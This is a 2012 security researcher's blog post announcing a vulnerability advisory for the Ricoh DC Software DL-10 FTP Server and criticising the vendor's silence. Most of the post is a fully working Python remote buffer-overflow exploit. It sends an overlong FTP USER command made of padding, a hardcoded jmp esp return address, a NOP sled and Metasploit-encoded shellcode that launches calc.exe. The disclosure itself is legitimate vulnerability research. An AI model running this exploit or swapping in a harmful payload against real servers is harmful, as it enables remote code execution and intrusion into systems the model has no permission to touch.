Julien Ahrens === @MrTuxracer

Vulnerability Intel | ROP Gadget Hunter | Privacy Enthusiast | Full-time BugBounty hunter | @Hacker0x01 MVH | @SynackRedTeam member | on a world-trip

Ricoh DC Software DL-10 FTP Server (SR10.exe)

21 Mar 2012 » RCE, Exploit, Advisory

This time I’ve found a more critical vulnerability with a CVSSv2 score of 7,5 coordinated by Secunia.com which has already been published on 2012-03-01, but due to a very unfortunate way of communication by Secunia, I haven’t been informed about the release of the advisory - that’s the reason for the late article on it :-(

But anyways, this vulnerability is a perfect example of how not to react to confidentially reported security issues: Ricoh did not response to any of Secunia’s notifications since my discovery and reporting of the bug on 2012-02-05. Even if it’s not one of their flagship products, there are always customers who take care of their entire network security and who don’t like security breaches at all!  Let’s hope that they’ll fix the issue after the full disclosure, which by the way works perfectly in such situations like this.

@Ricoh: If you read this and if have further questions regarding the bug, do not hesitate to contact me!

You can review the full advisory here.

And exclusively for Inshell.net readers, here’s a fully working exploit for Windows XP which will simply launch a calc.exe on the remote side :

#!/usr/bin/python

# Exploit Title: Ricoh DC Software DL-10 FTP Server (SR10.exe) <= 1.1.0.6 Remote Buffer Overflow Vulnerability
# Version:       <= 1.1.0.6
# Date:          2012-02-05
# Author:        Julien Ahrens
# Homepage:      www.inshell.net
# Software Link: http://www.ricohpmmc.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         Capftpd (former SR-10) is vulnerable too
# Howto:         "Log file name" has to be set

from struct import pack
import socket,sys
import os

target="192.168.0.1"
port=21

junk = "\x41" * 245
eip = pack('<L',0x7C92FCD8) #jmp esp from ntdll.dll
nops = "\x90" * 20

# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'

shellcode = ("\xdd\xc1\xbb\x45\x1d\x9a\xae\xd9\x74\x24\xf4\x5d\x2b\xc9" +
"\xb1\x33\x31\x5d\x17\x83\xed\xfc\x03\x18\x0e\x78\x5b\x5e" +
"\xd8\xf5\xa4\x9e\x19\x66\x2c\x7b\x28\xb4\x4a\x08\x19\x08" +
"\x18\x5c\x92\xe3\x4c\x74\x21\x81\x58\x7b\x82\x2c\xbf\xb2" +
"\x13\x81\x7f\x18\xd7\x83\x03\x62\x04\x64\x3d\xad\x59\x65" +
"\x7a\xd3\x92\x37\xd3\x98\x01\xa8\x50\xdc\x99\xc9\xb6\x6b" +
"\xa1\xb1\xb3\xab\x56\x08\xbd\xfb\xc7\x07\xf5\xe3\x6c\x4f" +
"\x26\x12\xa0\x93\x1a\x5d\xcd\x60\xe8\x5c\x07\xb9\x11\x6f" +
"\x67\x16\x2c\x40\x6a\x66\x68\x66\x95\x1d\x82\x95\x28\x26" +
"\x51\xe4\xf6\xa3\x44\x4e\x7c\x13\xad\x6f\x51\xc2\x26\x63" +
"\x1e\x80\x61\x67\xa1\x45\x1a\x93\x2a\x68\xcd\x12\x68\x4f" +
"\xc9\x7f\x2a\xee\x48\x25\x9d\x0f\x8a\x81\x42\xaa\xc0\x23" +
"\x96\xcc\x8a\x29\x69\x5c\xb1\x14\x69\x5e\xba\x36\x02\x6f" +
"\x31\xd9\x55\x70\x90\x9e\xaa\x3a\xb9\xb6\x22\xe3\x2b\x8b" +
"\x2e\x14\x86\xcf\x56\x97\x23\xaf\xac\x87\x41\xaa\xe9\x0f" +
"\xb9\xc6\x62\xfa\xbd\x75\x82\x2f\xde\x18\x10\xb3\x0f\xbf" +
"\x90\x56\x50")

payload = junk + eip + nops + shellcode

print "[*] Connecting to Target " + target + "..."

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect=s.connect((target, port))
    print "[*] Connected to " + target + "!"
except:
    print "[!] " + target + " didn't respond\n"
    sys.exit(0)

s.recv(1024)
print "[*] Sending malformed request..."
s.send('USER ' + payload + '\r\n')

print "[!] Exploit has been sent!\n"
s.close()